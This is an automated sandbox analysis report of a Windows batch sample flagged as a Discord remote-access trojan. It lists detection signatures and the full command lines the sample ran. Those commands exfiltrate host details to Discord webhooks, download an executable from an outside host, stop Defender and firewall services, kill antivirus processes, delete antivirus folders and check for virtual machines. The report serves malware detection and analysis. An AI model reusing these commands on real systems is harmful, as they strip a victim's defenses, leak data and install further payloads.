Edit tour
Windows
Analysis Report
main.bat.bin.bat
Overview
General Information
Detection
Discord Rat
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Discord Rat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to disable the Task Manager (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Suspicious Windows Service Tampering
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Windows Firewall Disabled via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 2344 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\main. bat.bin.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3700 cmdline:
curl -s -H "Content- Type: appl ication/js on" -d "{\ "content\" :\"User: u ser, Compu ter: user- PC\"}" "ht tps://disc ord.com/ap i/webhooks /129204476 2974785547 /-sVDk3ilu 3WEM17kfI_ edy7EuWfHE 7f0bes056n gUTuZWTzgc xB9dhTgyQx waVvv2Sgz" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - WMIC.exe (PID: 2852 cmdline:
wmic compu tersystem get manufa cturer,mod el MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - findstr.exe (PID: 3032 cmdline:
findstr /i "vmware v irtualbox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - curl.exe (PID: 3524 cmdline:
curl -s -H "Content- Type: appl ication/js on" -d "{\ "content\" :\"YAY use r, Compute r: user-PC \"}" "http s://discor d.com/api/ webhooks/1 2920447629 74785547/- sVDk3ilu3W EM17kfI_ed y7EuWfHE7f 0bes056ngU TuZWTzgcxB 9dhTgyQxwa Vvv2Sgz" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - net.exe (PID: 2100 cmdline:
net sessio n MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 6872 cmdline:
C:\Windows \system32\ net1 sessi on MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - powershell.exe (PID: 6712 cmdline:
powershell -Command "$process = Get-Proc ess -Id $p id; $proce ss.Process orAffinity = 1; $pro cess.Prior ityClass = 'High'; $ process.Pr iorityBoos tEnabled = $true; Ad d-Type -Ty peDefiniti on 'using System; us ing System .Runtime.I nteropServ ices; publ ic class W in32 { [Dl lImport(\" user32.dll \")] publi c static e xtern bool SetWindow DisplayAff inity(IntP tr hWnd, u int dwAffi nity); [Dl lImport(\" kernel32.d ll\")] pub lic static extern bo ol SetProc essWorking SetSize(In tPtr proc, int min, int max); }'; [Win32 ]::SetWind owDisplayA ffinity($p rocess.Mai nWindowHan dle, 0x11) ; [Win32]: :SetProces sWorkingSe tSize($pro cess.Handl e, -1, -1) ; $process .ProcessNa me = 'svch ost'" MD5: 04029E121A0CFA5991749937DD22A1D9) - csc.exe (PID: 6704 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\l1mwkp cb\l1mwkpc b.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 3684 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES33AA.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\l1m wkpcb\CSC5 5DD152A836 5426E9AFFE 8E8746FD1A 1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - explorer.exe (PID: 6704 cmdline:
explorer.e xe MD5: 662F4F92FDE3557E86D110526BB578D5) - powershell.exe (PID: 4424 cmdline:
powershell -Command "$currentP rincipal = New-Objec t Security .Principal .WindowsPr incipal([S ecurity.Pr incipal.Wi ndowsIdent ity]::GetC urrent()); if (-not $currentPr incipal.Is InRole([Se curity.Pri ncipal.Win dowsBuiltI nRole]::Ad ministrato r)) { Star t-Process -FilePath 'cmd.exe' -ArgumentL ist '/c C: \Users\use r\Desktop\ main.bat.b in.bat' -V erb RunAs -WindowSty le Hidden; exit }; $ process = Get-Proces s -Id $PID ; $process .PriorityC lass = 'Hi gh'; $proc ess.Proces sorAffinit y = 1; $pr ocess.Prio rityBoostE nabled = $ true" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3272 cmdline:
powershell -Command "$s = @('S DRSVC','Wi nDefend',' security c enter','wu auserv','W indows Def ender Serv ice','Wind ows Firewa ll','share daccess'); foreach ( $service i n $s) { St op-Service -Name $se rvice -For ce -ErrorA ction Sile ntlyContin ue }" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6872 cmdline:
powershell -Command "Stop-Proc ess -Name MSASCui -F orce -Erro rAction Si lentlyCont inue" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6364 cmdline:
powershell -Command "Set-NetFi rewallProf ile -Profi le Domain, Public,Pri vate -Enab led False" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 1372 cmdline:
powershell -Command "$processe s = @('mba m', 'mbams ervice', ' avastsvc', 'avastui' , 'avp', ' avgui', 'b dagent', ' bddownload er', 'bdre dline', 'b dss', 'bds ervicehost ', 'bdnage nt', 'bdsc an', 'bdco re'); fore ach ($p in $processe s) { Stop- Process -N ame $p -Fo rce -Error Action Sil entlyConti nue }" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6168 cmdline:
powershell -Command "$s='taskk ill /F /IM '; $p=@('m '+'bam.exe ','mbam'+' service.ex e','avast' +'svc.exe' ,'avast'+' ui.exe','a '+'vp.exe' ,'avg'+'ui .exe','bd' +'agent.ex e','bddown loader.exe ','bdre'+' dline.exe' ,'bd'+'ss. exe','bdse rv'+'iceho st.exe','b dnagent.ex e','bds'+' can.exe',' bdc'+'ore. exe'); for each($i in $p){iex \ "$s \"$i\" \"};" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 1440 cmdline:
powershell -Command "$paths = @(C:\Progr am Files\M alwarebyte s\*.*''C:\ Program Fi les\alwils ~1\avast4\ *.*', 'C:\ Program Fi les\Lavaso ft\Ad-awa~ 1\*.exe', 'C:\Progra m Files\ka sper~1\*.e xe', 'C:\P rogram Fil es\trojan~ 1\*.exe', 'C:\Progra m Files\f- prot95\*.d ll', 'C:\P rogram Fil es\tbav\*. dat', 'C:\ Program Fi les\avpers onal\*.vdf ', 'C:\Pro gram Files \Norton~1\ *.cnt', 'C :\Program Files\Mcaf ee\*.*', ' C:\Program Files\Nor ton~1\Nort on~3\*.*', 'C:\Progr am Files\N orton~1\No rton~1\spe edd~1\*.*' , 'C:\Prog ram Files\ Norton~1\N orton~1\*. *', 'C:\Pr ogram File s\Norton~1 \*.*'); fo reach ($p in $paths) { Remove- Item -Path $p -Force -Recurse -ErrorActi on Silentl yContinue }" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4080 cmdline:
powershell -Command "Stop-Proc ess -Name explorer - Force -Err orAction S ilentlyCon tinue" MD5: 04029E121A0CFA5991749937DD22A1D9) - curl.exe (PID: 6364 cmdline:
curl -s -H "Content- Type: appl ication/js on" -d "{\ "content\" :\"Failed to change directory to 'C:\\Us ers\\Publi c\\Documen ts\\Secret Document' \"}" "http s://ptb.di scord.com/ api/webhoo ks/1291851 4456200479 63/DdrKtNq FRSRXEVELO z3Obg6_LdI UNEiwcyGZb dN-1UiXnmN nz7ZMzVkKl apF0RrIhBj d" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - curl.exe (PID: 4268 cmdline:
curl -s -H "Content- Type: appl ication/js on" -d "{\ "content\" :\"Failed to create and change directory to 'C:\\U sers\\Publ ic\\Docume nts\\Secre t Document ' after re try\"}" "h ttps://ptb .discord.c om/api/web hooks/1291 8514456200 47963/DdrK tNqFRSRXEV ELOz3Obg6_ LdIUNEiwcy GZbdN-1UiX nmNnz7ZMzV kKlapF0RrI hBjd" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - powershell.exe (PID: 6104 cmdline:
powershell -Command "(New-Obje ct Net.Web Client).Do wnloadFile ('https:// diva.ink/e xe.exe', ' exe.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3372 cmdline:
powershell -Command "Invoke-Re stMethod - Uri 'https ://ptb.dis cord.com/a pi/webhook s/12918514 4562004796 3/DdrKtNqF RSRXEVELOz 3Obg6_LdIU NEiwcyGZbd N-1UiXnmNn z7ZMzVkKla pF0RrIhBjd ' -Method Post -Body (@{conten t='Failed to downloa d exe.exe' } | Conver tTo-Json) -ContentTy pe 'applic ation/json '" MD5: 04029E121A0CFA5991749937DD22A1D9)
- svchost.exe (PID: 5868 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DiscordRat | Yara detected Discord Rat | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |